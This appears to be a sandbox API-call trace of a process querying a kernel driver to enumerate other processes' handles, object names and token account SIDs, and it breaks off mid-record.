[0226.499] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0226.499] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.499] ObfDereferenceObject (Object=0xfffffa8001f9fdd0) returned 0x1 [0226.499] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.499] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.499] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.499] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.499] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.499] PsAcquireProcessExitSynchronization () returned 0x0 [0226.499] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880052b35d0) [0226.500] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001eec7d0, HandleInformation=0x0) returned 0x0 [0226.500] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.500] PsReleaseProcessExitSynchronization () returned 0x2 [0226.500] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0226.500] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.500] ObfDereferenceObject (Object=0xfffffa8001eec7d0) returned 0x1 [0226.500] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.500] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.500] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.500] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.500] PsLookupProcessByProcessId (in: ProcessId=0x7a4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.500] PsAcquireProcessExitSynchronization () returned 0x0 [0226.500] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fc5b30, ApcState=0xfffff880052b35d0) [0226.500] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.500] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.500] PsReleaseProcessExitSynchronization () returned 0x2 [0226.500] ObfDereferenceObject (Object=0xfffffa8001fc5b30) returned 0x12 [0226.500] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.500] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.500] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.500] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x318) returned 0xc8 [0226.500] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.500] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001fe3b30, HandleInformation=0x0) returned 0x0 [0226.501] ObOpenObjectByPointer (in: Object=0xfffffa8001fe3b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.501] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x14 [0226.501] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.501] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.501] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.501] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.501] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.503] CloseHandle (hObject=0xc4) returned 1 [0226.503] CloseHandle (hObject=0xc8) returned 1 [0226.503] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.503] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.503] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.503] PsAcquireProcessExitSynchronization () returned 0x0 [0226.503] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880052b35d0) [0226.503] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fd9470, HandleInformation=0x0) returned 0x0 [0226.503] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.503] PsReleaseProcessExitSynchronization () returned 0x2 [0226.503] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0226.503] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.503] ObfDereferenceObject (Object=0xfffffa8001fd9470) returned 0x1 [0226.503] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.503] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.503] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.503] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.503] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.504] PsAcquireProcessExitSynchronization () returned 0x0 [0226.504] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880052b35d0) [0226.504] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001eaef20, HandleInformation=0x0) returned 0x0 [0226.504] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.504] PsReleaseProcessExitSynchronization () returned 0x2 [0226.504] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0226.504] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.504] ObfDereferenceObject (Object=0xfffffa8001eaef20) returned 0x1 [0226.504] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.504] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.504] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.504] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.504] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.504] PsAcquireProcessExitSynchronization () returned 0x0 [0226.504] KeStackAttachProcess (in: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001fe3b30, ApcState=0xfffff880052b35d0) [0226.504] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.504] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.504] PsReleaseProcessExitSynchronization () returned 0x2 [0226.504] ObfDereferenceObject (Object=0xfffffa8001fe3b30) returned 0x12 [0226.504] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.504] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.504] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.505] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.505] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x524) returned 0xc8 [0226.505] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.505] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001ff7950, HandleInformation=0x0) returned 0x0 [0226.505] ObOpenObjectByPointer (in: Object=0xfffffa8001ff7950, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.505] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x14 [0226.505] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.505] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.505] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.505] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.505] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.507] CloseHandle (hObject=0xc4) returned 1 [0226.507] CloseHandle (hObject=0xc8) returned 1 [0226.507] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.507] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.507] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.507] PsAcquireProcessExitSynchronization () returned 0x0 [0226.507] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880052b35d0) [0226.507] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fed070, HandleInformation=0x0) returned 0x0 [0226.507] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.507] PsReleaseProcessExitSynchronization () returned 0x2 [0226.507] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0226.507] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.507] ObfDereferenceObject (Object=0xfffffa8001fed070) returned 0x1 [0226.507] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.508] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.508] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.508] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0226.508] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.508] PsAcquireProcessExitSynchronization () returned 0x0 [0226.508] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880052b35d0) [0226.508] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fd8070, HandleInformation=0x0) returned 0x0 [0226.508] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.508] PsReleaseProcessExitSynchronization () returned 0x2 [0226.508] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0226.508] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.508] ObfDereferenceObject (Object=0xfffffa8001fd8070) returned 0x1 [0226.508] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.508] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.508] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.508] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.508] PsLookupProcessByProcessId (in: ProcessId=0x524, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.508] PsAcquireProcessExitSynchronization () returned 0x0 [0226.508] KeStackAttachProcess (in: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001ff7950, ApcState=0xfffff880052b35d0) [0226.508] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.509] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.509] PsReleaseProcessExitSynchronization () returned 0x2 [0226.509] ObfDereferenceObject (Object=0xfffffa8001ff7950) returned 0x12 [0226.509] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.509] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.509] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.509] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.509] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x804) returned 0xc8 [0226.509] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.509] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8002023890, HandleInformation=0x0) returned 0x0 [0226.509] ObOpenObjectByPointer (in: Object=0xfffffa8002023890, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0226.509] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x14 [0226.509] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8002fc1f40 | out: TokenHandle=0xfffffa8002fc1f40*=0xc4) returned 0x0 [0226.509] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0226.509] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.509] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.509] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.512] CloseHandle (hObject=0xc4) returned 1 [0226.512] CloseHandle (hObject=0xc8) returned 1 [0226.512] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.512] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.512] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.512] PsAcquireProcessExitSynchronization () returned 0x0 [0226.512] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880052b35d0) [0226.512] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fe3100, HandleInformation=0x0) returned 0x0 [0226.512] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.512] PsReleaseProcessExitSynchronization () returned 0x2 [0226.512] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0226.512] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.513] ObfDereferenceObject (Object=0xfffffa8001fe3100) returned 0x1 [0226.513] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.513] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.513] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.513] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0226.513] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.513] PsAcquireProcessExitSynchronization () returned 0x0 [0226.513] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880052b35d0) [0226.513] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800202a630, HandleInformation=0x0) returned 0x0 [0226.513] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.513] PsReleaseProcessExitSynchronization () returned 0x2 [0226.513] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0226.513] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.513] ObfDereferenceObject (Object=0xfffffa800202a630) returned 0x1 [0226.513] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.513] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.513] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.513] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.513] PsLookupProcessByProcessId (in: ProcessId=0x804, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.513] PsAcquireProcessExitSynchronization () returned 0x0 [0226.513] KeStackAttachProcess (in: PROCESS=0xfffffa8002023890, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002023890, ApcState=0xfffff880052b35d0) [0226.513] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.513] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.513] PsReleaseProcessExitSynchronization () returned 0x2 [0226.513] ObfDereferenceObject (Object=0xfffffa8002023890) returned 0x12 [0226.513] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.513] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0226.514] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.514] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.514] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x814) returned 0xc8 [0226.514] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, 